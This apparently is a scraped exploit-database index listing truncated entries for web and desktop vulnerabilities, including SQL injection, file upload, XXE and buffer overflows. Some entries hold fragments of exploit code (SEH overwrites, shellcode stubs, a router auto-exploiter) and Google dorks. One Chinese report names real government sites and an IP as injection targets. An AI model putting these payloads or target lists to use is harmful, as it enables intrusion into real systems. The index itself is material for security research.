JEECMS一处通用越权

简要描述： 1 详细说明： http://wooyun.org/bugs/wooyun-2015-096948 路人甲已经把xss挖透了，那么我们不挖xss了，我们转战挖越权 收货地址存在越权修改 漏洞证明： http://wooyun.org/bugs/wooyun-2015-096948 路人甲已经把xss挖透了，那么我们不挖xss了，我们转战挖越权 收货地址存在越权修改...

Django 任意文件下载漏洞

No description provided by source...

D-Link/TRENDnet NCC Service Command Injection Exploit

This Metasploit module exploits a remote command injection vulnerability on several routers. The vulnerability exists in the ncc service, while handling ping commands. This Metasploit module has been tested on a DIR-626L emulated environment only. Several D-Link and TRENDnet devices are reported ...

WordPress Windows Desktop And iPhone Photo Uploader File Upload

Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility Author : Manish Kishan Tanwar AKA error1046 Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ Download Link :...

WordPress Plugin SP Project Document Manager 2.5.3 - Blind SQL Injection

WordPress Plugin SP Project Document Manager 2.5.3 - Blind SQL Injection Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection Google Dork: inurl:wp-content/plugins/sp-client-document-manager Date: 2015-03-04 Exploit Author: catsecurity Vendor Homepage:...

TurboMail 6.0.0 /nicknamelogin.jsp 登录绕过漏洞

No description provided by source...

Wordpress Gravity Forms 1.8.19 /include/upload.php 文件上传漏洞

/includes/upload.php$filename = isset$REQUEST"name" ? $REQUEST"name" : ''; $fieldid = rgpost"fieldid"; $field = GFFormsModel::getfield$form, $fieldid; if empty $field die; // Clean the fileName for security reasons $filename = pregreplace'/^\w.+/', '', $filename; …. $tmpfilename = $formuniqueid...

Fraction Theme < 1.1.2 - Privilege Escalation

This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...

Clipbucket 2.7 RC3 0.9 - Blind SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection Date : 20 February 2015 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://clip-bucket.com/ Software Link :...

Pentaho &lt; 4.5.0 - User Console XML Injection

======================================================================== title: Pentaho User Console XML Injection Vulnerability program: Pentaho BI User Console vulnerable version: Pentaho was injected into the XML of the client's POST request. This tag defines an external entity, xxe8295c, whic...

YXcms建站系统最新版储存XSS盲打后台（demo+本地演示）

简要描述： 缺个移动硬盘存片子 详细说明： 上次提交说是self-xss没给过，为了证明不是self-xss，这次盲打后台一下吧 demo演示 首先来到YXCMS的demo站点http://demo.yxcms.net 然后注册个账号，在邮箱那里直接插入"/ 可以看到没有任何过滤，直接提示信息编辑成功 返回后直接弹窗 上次截止到这里就停了，并没有看能不能打后台，因为他这个demo是不提供后台演示的（可能怕被后台拿shell吧，哈哈 https://images.seebug.org/upload/201501/20104758ae72a78e0...

ArticleFR CMS 3.0.5 - SQL Injection

Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5 Google Dork: N/A Date: 01/21/2015 Exploit Author: Tran Dinh Tien [email protected] & ITAS Team www.itas.vn Vendor Homepage: http://freereprintables.com Software Link: https://github.com/articlefr/articleFR Version: version 3.0.5...

Orbital-Viewer-1.04-(.ov)

Pro: Orbital Viewer v1.04 .orb/.ov Local Universal Stack Overflow Exploit SEH Author: CrazyHacker Download: http://www.orbitals.com/orb/setupov.exe Date: 20-6-2010 $junk = 6060; $header = "OrbitalFileV1.0\n"; $nseh = "\xeb\xf9\xff\xff"; jmp back 7 bytes $seh = "\x0b\x0b\x27\x00"; universal pop eb...

Microsoft-Excel-OBJ-Record

Title: Microsoft Excel OBJ Record Stack Overflow Version: Excell 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:36640 str2 = strTotal37440: shellcode calc.exe shellcode =...

Acoustica-Audio-Converter-Pro-1.1

Exploit Title: Acoustica Audio Converter Pro 1.1 build 25 Heap Overflow.mp3.wav.ogg.wma PoC Date: September 21 2010 Author: Carlos Hollmann Software Link: http://www.acoustica.com/audio-converter/download.htm m3u = "crash.m3u" payload =...

FatPlayer-0.6b-(.wav)

Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability SEH Date: 10/18/10 Author: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/fatplayer/files/ Version: 0.6 Beta junk = "\x41" 4132 nSEH = "\x90\x90\xeb\x06" SEH = 0x0046bee3.pack'V' pop pop...

AVM Fritz!box Auto Exploiter

?php echo " +++++++++++++++++++++++++++++++++++++++++++++++ ++ Fritz!Box Fucker ++ ++ By ++ ++ BaD-HaCKeR-MaN ++ +++++++++++++++++++++++++++++++++++++++++++++++ "; settimelimit0; errorreporting0; function func1$url $curl=curlinit; curlsetopt$curl, CURLOPTRETURNTRANSFER,1; curlsetopt$curl,...

某大型政府服务系统Oracle注入(使用量大)

简要描述： rt，霍霍。为了生活费也是蛮拼的。。。。 详细说明： 问题厂商:深圳太极软件有限公司 一套专门的政务服务系统 用户量：大 影响：广 注入点 browsebgxz.do?method=dept&deptid=（deptid存注入） google关键字：inurl:browsebgxz.do?method= 案例: http://www.gygxzw.gov.cn:8066/browsebgxz.do?method=dept&deptid=556631684 http://61.189.156.73/browsebgxz.do?method=dept&deptid=0094204...

Free-MP3-CD-Ripper-1.1

Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version : 1.1 Tested on : Windows xp sp3 en Date : 27/08/2011 Author : X-h4ck Website : http://www.pirate.al , http://theflashcrew.blogspot.com Email : [email protected]...

Mini-stream-RM-MP3-Converter-3.1.2.2

Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41" 17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90" 16 ShellCode =...